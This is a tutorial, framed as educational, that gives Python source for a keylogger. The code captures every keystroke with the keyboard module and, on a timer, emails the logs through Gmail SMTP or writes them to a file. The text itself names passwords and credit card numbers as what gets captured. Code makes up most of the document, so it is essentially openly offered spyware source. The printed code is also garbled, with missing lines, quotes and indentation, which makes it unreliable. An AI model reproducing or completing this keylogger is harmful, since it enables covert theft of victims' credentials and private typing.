A keylogger is a type of surveillance technology used to monitor and record each keystroke typed on a specific computer's keyboard. In this tutorial, you will learn how to write a keylogger in Python.
First, we gonna need to install a module called keyboard, go to the terminal or the command prompt and write:
pip3 install keyboard
You are maybe wondering, why a keylogger is useful ? Well, when a hacker (or a script kiddie) uses this for unethical purposes, he/she will register everything you type in the keyboard including your credentials (credit card numbers, passwords, etc...)
The goal of this tutorial is to make you aware of these kind of scripts as well as learning how to implement such malicious scripts on your own for educational purposes, let's get started!
import keyboard # for keylogs
import smtplib # for sending email using SMTP protocol (gmail)
# Timer is to make a method runs after an `interval` amount of time
from threading import Timer
from datetime import datetime
SEND_REPORT_EVERY = 60 # in seconds, 60 means 1 minute and so on
EMAIL_ADDRESS = "put_real_address_here@gmail.com"
EMAIL_PASSWORD = "put_real_pw"
class Keylogger:
def __init__(self, interval, report_method="email"):
# we gonna pass SEND_REPORT_EVERY to interval
self.interval = interval
self.report_method = report_method
# this is the string variable that contains the log of all
# the keystrokes within `self.interval`
self.log = ""
# record start & end datetimes
self.start_dt = datetime.now()
self.end_dt = datetime.now()
def callback(self, event):
This callback is invoked whenever a keyboard event is occured
(i.e when a key is released in this example)
name = event.name
if len(name) > 1:
# not a character, special key (e.g ctrl, alt, etc.)
# uppercase with []
if name == "space":
# " " instead of "space"
name = " "
elif name == "enter":
# add a new line whenever an ENTER is pressed
name = "[ENTER]\n"
elif name == "decimal":
name = "."
# replace spaces with underscores
name = name.replace(" ", "_")
name = f"[{name.upper()}]"
# finally, add the key name to our global `self.log` variable
self.log += name
def update_filename(self):
# construct the filename to be identified by start & end datetimes
start_dt_str = str(self.start_dt)[:-7].replace(" ", "-").replace(":", "")
end_dt_str = str(self.end_dt)[:-7].replace(" ", "-").replace(":", "")
self.filename = f"keylog-{start_dt_str}_{end_dt_str}"
def report_to_file(self):
"""This method creates a log file in the current directory that contains
the current keylogs in the `self.log` variable"""
# open the file in write mode (create it)
with open(f"{self.filename}.txt", "w") as f:
# write the keylogs to the file
print(self.log, file=f)
print(f"[+] Saved {self.filename}.txt")
def sendmail(self, email, password, message):
# manages a connection to an SMTP server
server = smtplib.SMTP(host="smtp.gmail.com", port=587)
# connect to the SMTP server as TLS mode ( for security )
# login to the email account
server.login(email, password)
# send the actual message
server.sendmail(email, email, message)
# terminates the session
def report(self):
This function gets called every `self.interval`
It basically sends keylogs and resets `self.log` variable
if self.log:
# if there is something in log, report it
self.end_dt = datetime.now()
# update `self.filename`
if self.report_method == "email":
self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)
elif self.report_method == "file":
# if you want to print in the console, uncomment below line
# print(f"[{self.filename}] - {self.log}")
self.start_dt = datetime.now()
self.log = ""
timer = Timer(interval=self.interval, function=self.report)
# set the thread as daemon (dies when main thread die)
timer.daemon = True
# start the timer
def start(self):
# record the start datetime
self.start_dt = datetime.now()
# start the keylogger
# start reporting the keylogs
# block the current thread, wait until CTRL+C is pressed
if __name__ == "__main__":
# if you want a keylogger to send to your email
# keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="email")
# if you want a keylogger to record keylogs to a local file
# (and then send it using your favorite method)
keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="file")
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